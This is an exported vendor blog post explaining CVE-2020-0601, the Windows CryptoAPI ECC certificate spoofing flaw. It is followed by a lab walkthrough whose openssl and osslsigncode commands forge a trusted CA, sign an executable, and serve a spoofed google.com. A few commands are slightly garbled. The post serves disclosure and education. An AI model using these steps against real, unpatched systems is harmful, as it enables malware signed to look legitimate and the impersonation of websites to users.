{"id":59358,"date":"2022-10-29T16:22:44","date_gmt":"2022-10-29T08:22:44","guid":{"rendered":"https:\/\/version-2.com\/?p=59358"},"modified":"2023-07-24T18:44:16","modified_gmt":"2023-07-24T10:44:16","slug":"windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2022\/10\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\/","title":{"rendered":"Windows CryptoAPI Spoofing &#8211; Certificate Incorrect Validation &#8211; CVE-2020-0601"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"59358\" class=\"elementor elementor-59358\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\" width=\"480\" height=\"360\" \/><\/p><div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><p><strong>Vulnerability Details:<\/strong><\/p><p>A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.<\/p><p>ECC relies on different parameters. These parameters are standardized for many curves. However, system didn\u2019t check all these parameters. The parameter <code>G<\/code> (the generator) was not checked, and the attacker can therefore supply their own generator, such that when system tries to validate the certificate against a trusted CA, it&#8217;ll only look for matching public keys, and then use the generator of the certificate.<\/p><p>In order to yield the same public key to spoof the certificate, private key is set to 1<\/p><p>public Key = Private Key * Generator<\/p><p>Public Key = Generator<\/p><p>Trusted public key is used as the generator of spoofing certificate; Generator is not validated by system<\/p><p><code>MicrosoftECCProductRootCertificateAuthority.cer<\/code> is by default a trusted root certificate authority (CA) using ECConWindows10. Anything signed with this certificate will therefore automatically be trusted.<\/p><p><strong>CVSS v3:<\/strong><\/p><ul><li><p>Base Code 5.8<\/p><\/li><li><p>Confidentiality Impact Partial<\/p><\/li><li><p>Integrity Impact Partial<\/p><\/li><li><p>Access Complexity Medium<\/p><\/li><li><p>Authentication not required<\/p><\/li><li><p>Availability Impact non<\/p><\/li><\/ul><p><strong>Mitigation:<\/strong><\/p><p>Microsoft Windows 2020 updates had been released to patch CVE-2020-0601 vulnerability.<\/p><p>Major Impacted Browsers:<\/p><ul><li><p>Windows 10: Version 1607<\/p><\/li><li><p>Windows 10 Version 1709<\/p><\/li><li><p>Windows 10 Version 1803<\/p><\/li><li><p>Windows 10 Version 1809<\/p><\/li><li><p>Windows 10 Version 1903<\/p><\/li><li><p>Windows 10 Version 1909<\/p><\/li><li><p>Windows Server 2016-<\/p><\/li><li><p>Windows Server 2016 Version 1803<\/p><\/li><li><p>Windows Server 2016 Version 1903<\/p><\/li><li><p>Windows Server 2016 Version 1909<\/p><\/li><li><p>Windows Server 2019-<\/p><\/li><\/ul><p><strong>Exploitation:<\/strong><\/p><p>Files location &#8211; <a href=\"https:\/\/packetstormsecurity.com\/files\/author\/14686\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/packetstormsecurity.com\/files\/author\/14686<\/a><\/p><p>Extract the public key from the trusted CA<\/p><pre><code>ruby main.rb .\/MicrosoftECCProductRootCertificateAuthority.cer<\/code><\/pre><p>Generate a new x509 certificate based on this key. This will be spoofed CA<\/p><pre><code>openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1xjzyfrf90llg0lcdexpp.jpeg\" \/><\/p><p>Generate a new key. It will be used to create a code signing certificate, which we will sign with our own CA<\/p><pre><code>openssl ecparam -name secp384r1 -genkey -noout -out cert.key<\/code><\/pre><p>Next, create a new certificate signing request (CSR)<\/p><pre><code>openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls<\/code><\/pre><p>Sign new CSR with spoofed CA and CA key. This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043.<\/p><pre><code>ope\n<\/code><\/pre><pre><code>openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key \u2013CAcreateserial\n-out cert.crt -days 10000 -extfileopenssl_tls.conf -extensions v3_tls<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u21mj5frhd0llga21dc9bn.jpeg\" \/><\/p><p>Pack the certificate, its key and the spoofed CA into a PKCS12 file for signing executables<\/p><pre><code>openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name \"Code \nSigning\" -out cert.p12<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u24c0qc3ws0llp017wbmsw.jpeg\" \/><\/p><p>Sign your executable with PKCS12 file<\/p><pre><code>osslsigncode sign -pkcs12 cert.p12 -n \"Signed\" -in 7z1900-x64.exe -out 7z1900- x64_signed.exe<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u2akydc3zp0llpesl128ks.jpeg\" \/><\/p><p>In windows VM, navigate to C:\\Windows\\System32\\drivers\\etc\\hosts<\/p><pre><code>Add IP address of Ubuntu VM and URL - https:\/\/www.google.com<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u2pg8yc46q0llp1gtkcqhu.jpg\" \/><\/p><p>Files <code>cert.crt<\/code>, <code>cert.key<\/code>, and <code>spoofed_ca.crt<\/code> are used to serve content. Add the spoofed_ca.crt as a certificate chain in your server&#8217;s HTTPS configuration. Configure \u201cindex.js\u201d server file.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3s1c4c4vm0llpbuh3cu7l.jpg\" \/><\/p><p>Server is started in Ubuntu VM<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3tolxfsim0llg1aue90bf.jpg\" \/><\/p><p>In Windows VM, open browser and navigate to <a href=\"https:\/\/www.google.com\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/www.google.com<\/a>.<\/p><pre><code>Error - \u201cYour connection isn\u2019t private\u201d is displayed<\/code><\/pre><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3ue7ic4xb0llpbifj63s3.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3v8x6c4yn0llpgn9admdf.jpg\" \/><\/p><p>Check certificate information. It is changed to the details of the spoofed certificate<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3vw9cc4z40llpcdx93xl0.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3wms5fsll0llgeyi5cru6.jpg\" \/><\/p><p>The CA Root certificate is not trusted because it is not in the Trusted Root Certification Authorities store<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3x9xbfsm00llgbqg2fsez.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3xyjac50n0llp8omw0jba.jpg\" \/><\/p><p>Export the certificate<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3yntufsmt0llg2fp7eza5.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u3zcd0c51g0llpelwdgc9a.jpg\" \/><\/p><p>Install the spoofed certificate in Trusted Root Certification Authorities<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u40ngfc52u0llphrjmhmmt.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u41oqtfspk0llg8p7ocgd1.jpg\" \/><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u42mzoc54r0llp84h189wn.jpg\" \/><\/p><p>Spoofed Certificate is in Trusted Root Certification Authorities<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u49govc5970llp1q0laq2g.jpg\" \/><\/p><p>Open Browser &#8211; Internet Explorer and navigate to <a href=\"https:\/\/www.google.com\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/www.google.com<\/a><\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u480mic5860llp7d3qb919.jpg\" \/><\/p><p>Spoofed CA is validated by web browser as Trusted Root CA and original <a href=\"https:\/\/www.google.comcontent\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/www.google.comcontent<\/a> is replaced with the incorrect information as mentioned in \u201cindex.js\u201d file.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u4bmqwc5an0llpegvzgbzz.jpg\" \/><\/p><p>CVE-2020-0601 &#8211; Windows incorrect ECC certificate validation vulnerability is implemented<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u4gsvhc5dn0llp27d6733m.jpg\" \/><\/p><p>Reference:<\/p><p>&#8211; <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-0601\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-0601<\/a><\/p><p>&#8211; <a href=\"https:\/\/packetstormsecurity.com\/files\/author\/14686\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/packetstormsecurity.com\/files\/author\/14686\/<\/a><\/p><p>&#8211; github.com-ollypwn-CVE-2020-0601_-_2020-01-17_10-09-11<\/p><p>#CryptoAPI #webbrowser #microsoft #certificate #certificatevalidation #<strong>CVE-2020-0601<\/strong><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Vulnerability Details: A spoofing vulnerability exists  [&hellip;]<\/p>\n","protected":false},"author":143524195,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,488,61],"tags":[477,489],"class_list":["post-59358","post","type-post","status-publish","format-standard","hentry","category-vrx","category-488","category-press-release","tag-vrx","tag-489"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Vulnerability Details: A spoofing vulnerability exists [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-29T08:22:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-24T10:44:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"version2hk\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"version2hk\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\\\/\"},\"author\":{\"name\":\"version2hk\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\"},\"headline\":\"Windows CryptoAPI Spoofing &#8211; Certificate Incorrect Validation &#8211; CVE-2020-0601\",\"datePublished\":\"2022-10-29T08:22:44+00:00\",\"dateModified\":\"2023-07-24T10:44:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\\\/\"},\"wordCount\":544,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2022\"],\"articleSection\":[\"vRx\",\"2022\",\"Press Release\"],\"inLanguage\":\"zh-HK\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2022\\\/10\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\",\"name\":\"Windows CryptoAPI Spoofing - Certificate Incorrect Validation - CVE-2020-0601 - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\",\"datePublished\":\"2022-10-29T08:22:44+00:00\",\"dateModified\":\"2023-07-24T10:44:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cl9u1m81hfr9q0llg6940djn3.jpg?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/windows-cryptoapi-spoofing-certificate-incorrect-validation-cve-2020-0601#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Windows CryptoAPI Spoofing &#8211; Certificate Incorrect Validation &#8211; CVE-2020-0601\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 